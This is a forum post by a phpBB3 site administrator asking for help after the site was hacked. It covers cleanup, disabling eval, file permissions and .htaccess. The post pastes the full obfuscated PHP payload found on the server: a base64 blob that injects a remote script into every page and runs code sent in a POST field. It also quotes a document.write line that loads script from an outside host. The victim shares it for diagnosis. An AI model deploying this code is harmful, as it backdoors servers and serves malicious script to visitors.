Hacked with eval(base64_decode - Please Help
Hi,
Our site has been hacked using "eval(base64_decode(" and "<script src=". We use phpbb3 with some modifications to it, but that's about it (there are some archives and html files, but nothing else). I've deleted everything and I'll be re-installing phpbb3 sans any mods. I've deleted all our ftp accounts and database passwords.
Still, I have some questions:
-Our site is contributed by one of our users and he has others sharing his site as well. He believes it's just us, which it very well might be, but is there anything I should know to look out for in regards to this? I'd really rather not have to ask our supplier to change the passwords for everyone who uses his space.
-I tried to read the "raw access logs". Not that I'd really know what to do with that info (some things did look suspicious to me though), but I figured it might be of some help.
EDIT: I've since checked the archive logs checkbox.
-As someone suggested, I'd like to disable the ability for eval to run at all on our site as it doesn't look like phpbb3 uses it at all so why let it run for a hacker. Can I do that from cPanel or something or do I have to ask hostmonster to do that? If I can do it, how do I do it? via the PHP config somehow?
EDIT: I figured out that you can easily do it by editing the php.ini file in your root folder with adding eval to the disable_functions directive. This page says Apache needs to be restarted though and I don't know if I need to do that somehow or it will do it on its own.
-One example of the code reads,. Reading up on this I found out I can decode this to see where (backdoor?) files have been left, but when I try to decode it I just find more php code and another link to the site the "script src=" code links to. Could someone please show me how others find these file locations for other people having this problem?Code:<?php eval(base64_decode('aWYoIWlzc2V0KCRtNzc5djEpKXtmdW5jdGlvbiBtNzc5digkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJ0aGJuUnZMbUZqTG1wd0wyTnZkWEp6WlM5V1NWWkpSQzV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIG03Nzl2MigkYSwkYiwkYywkZCl7Z2xvYmFsICRtNzc5djE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJG03Nzl2MSkpY2FsbF91c2VyX2Z1bmMoJG03Nzl2MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdtNzc5dicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdtNzc5dicpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRtNzc5dmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ203Nzl2MicpKSE9J203Nzl2MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>
-If I could, I'd much rather just clean our forum files as best as I can (using a text editor I can easily and quickly do this replacing the offending code with nothing), but I'm a bit worried I've missed something that includes something other than "eval(base64_decode(" and "<script src=". If someone has experience with this attack, is there anything else I should look for? With the eval thing I am also talking about the new gifimg.php files and with script src I'm also talking about the "document.write('<script src=http://kanto.ac.jp/course/VIVID.php ><\/script>');" in the .js files.
-Is this definitely coming through our forum somehow or could it very likely be coming in another way, maybe from someone else sharing the space (we do have separate directories) or maybe someone's computer got compromised and their password info was stolen? Or does this eval stuff necessarily mean it was some kind of XSS attack?
-I've read that directory permissions should be no higher than 755, but I've read [http://www.phpbb.com/kb/article/phpb...-permissions/] that some folders for phpbb need to be 777. Is this a problem or no? I've read that disabling the uploading of avatars is an option, but what about the other folders?
-Our root .htaccess reads:
which as far as I can tell is just telling it to redirect to the portal like I asked it to from cPanel. Is it okay?Code:RewriteEngine on AddHandler application/x-httpd-php5 .inc RewriteCond %{HTTP_HOST} ^[domain_snipped]$ [OR] RewriteCond %{HTTP_HOST} ^[domain_snipped]$ RewriteRule ^/?$ "http\:\/\/[domain_snipped]\/portal\.php" [R=301,L]
-Is there anything else I haven't mentioned that I should be looking into?
Unfortunately our site is a little community that greatly depends on forum activity and even though we've been going strong for over 7 years we've had a fair amount of turnover recently, so I'm afraid this attack is really going to hurt us especially with all our newcomers if I don't get this hole plugged fast and for good.
I'll truly appreciate any help. Thank you.
Reply With Quote